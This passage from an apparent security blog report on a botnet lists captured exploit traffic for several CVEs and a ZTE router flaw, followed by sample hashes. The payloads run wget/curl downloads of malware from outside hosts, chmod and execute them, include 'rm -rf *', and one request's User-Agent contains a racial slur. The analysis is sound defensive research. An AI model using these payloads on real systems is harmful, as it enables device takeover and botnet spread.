GET /qsr_server/device/getThumbnail?sourceUri= +-;wget http://46.19.141.122/lg; curl -O http://46.19.141.122/lg; chmod 777 lg; sh lg;&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&=1537275717150$ HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Hello, World

37. CVE-2020-8958 [8]

GET /boaform/admin/formPing?target_addr=;wget%20http://46.19.141.122/netlink%20-O%20-%3E%20/tmp/netlink;chmod%20777%20/tmp/netlink;sh%20/tmp/netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Hello, World

38. CVE-2021-35394 [14] A UDP packet with the following payload is used and sent to UDP port 9034.

orf;cd /tmp; rm -rf mpsl; cd /tmp; /bin/busybox wget http://89.203.251.188/mipsel && chmod +x mipsel && ./mipsel

39. CVE-2017-18377 [12] The contents of the ‘svr’ parameter are executed on the target system. In this case, it writes a simple downloader script onto the system with the file path ‘tmp/goahead’ through several requests. Text Description automatically generated Text Description automatically generated 40. CVE-2017-5638 [10] The following exploit code goes into the Content-Type header of an HTTP request. It seems that this code affects only Windows systems, since #cmd, which would run on Unix-like systems, is empty.

%{(#_=’multipart/form-data’).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccmem?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstange(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExgetExcludedPackage().clear()).(#ognlUtil.getExcludedClasses().cleac()).(#context.setMemberAccess(#dm)))).(#cmd=”).(#cmd2=’start powershell.exe iex(New-Object Net.WebClient).DownloadString(“?Wea25a9da\’)’).(#iswin=(@java.lang.System@getProperty(‘os.name’).contains(‘ind’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd2}:{‘/bin/sh’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

41. ZTE ZXV10 H108L “manager_dev_ping_t.gch” RCE [15] First request:

POST /login.gch HTTP/1.1 User-Agent: ZTE Nigger Content-Length: 420 Connection: keep-alive Accept: */* Frm_Logintoken=4&Username=root&Password=W%21n0%26oO7.

Second request:

POST /manager_dev_ping_t.gch HTTP/1.1 User-Agent: ZTE Nigger Content-Length: 420 Connection: keep-alive Accept: */* &Host=;$(cd /tmp; rm -rf *; wget http://amkbins.duckdns.org/bins/ascaris.mips; chmod 777 ascaris.mips; ./ascaris.mips zte.selfrep)&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit

Third request:

POST /getpage.gch?pid=1001&logout=1 HTTP/1.1 User-Agent: ZTE Nigger Content-Length: 420 Connection: keep-alive Accept: */*

File hashes mentioned in the report

  SHA256
1 01b2427dc8168bd4d0f05776c44e7fbd91653665536a0fb9652d544aff24c99b
2 0385ea0d5236234cab71f9d11c01e35ff0965167524bc6c65f4184b11048dc30
3 0507968a6b28ea1bf4f9de6aca126b6ae1681b55c05e13257b3590b4b9f6278c
4 0ae006b4b351655ef294c63ae190a2a4859f742aa8a9ccb64b905a8fc3552177
5 9c16171d65935817afd6ba7ec85cd0931b4a1c3bafb2d96a897735ab8e80fd45
6 11347e83d9df6843fb26a8eb1f63f8a9e12fa4546e61790882c89c69a2df85b0
7 23f7bb9e34839b06298e3ddb5a9f47ca3e78e83e17c0f0363b28dd7a16219ecd
8 40efadebd319686595727d07b7b1e1518a89074098c05a2a746f7846efe1e161
9 0e7c96a22e3612c68866a8693cc583df95972d3444978ce163c024a45682133a
10 d64412bbb79b4eb31e6923a9e0dcae0fe16129a3105e12a5b8df78f3f53e79f0
11 1967cdb03e86829b29b74b6ccae1b711948873d0133f17807e4fa3a71b8d6184
12 ed57ba13d88d6709eb1e886f3ee697b6c75a732f6eef7ad5a089ca055b513398
13 40efadebd319686595727d07b7b1e1518a89074098c05a2a746f7846efe1e161
14 d43beefdd14a53c18f8d2cbe1a4ea73f6da52cb61ed61c31340d6719d861995f
15 a50b0a7c5a0ad5234130c2a963d7f175fc685cee71c214b392a3b7d89a24ced4
16 c2eade66e8ecd493ae02bb2fbe766cac97c0a712c299dea918e01f923726ab31
  1. nvd.nist.gov disagrees
  2. nvd.nist.gov disagrees
György Lupták

More like this

8 min read

The Story About Three Million Toothbrushes Used in a DDoS Attack Is Not True

By Zoltan Balazs
IoT Labs
6 min read

12 Most Popular IoT Devices in 2023

By CUJO AI News
IoT
4 min read

The Fastest-growing Types of IoT Devices in 2023 and the Brands Behind Them

By CUJO AI News
IoT

Other posts by György Lupták

21 min read

The Zerobot Botnet: Vulnerabilities Targeted and Exploits Used in Detail

By György Lupták
Cybersecurity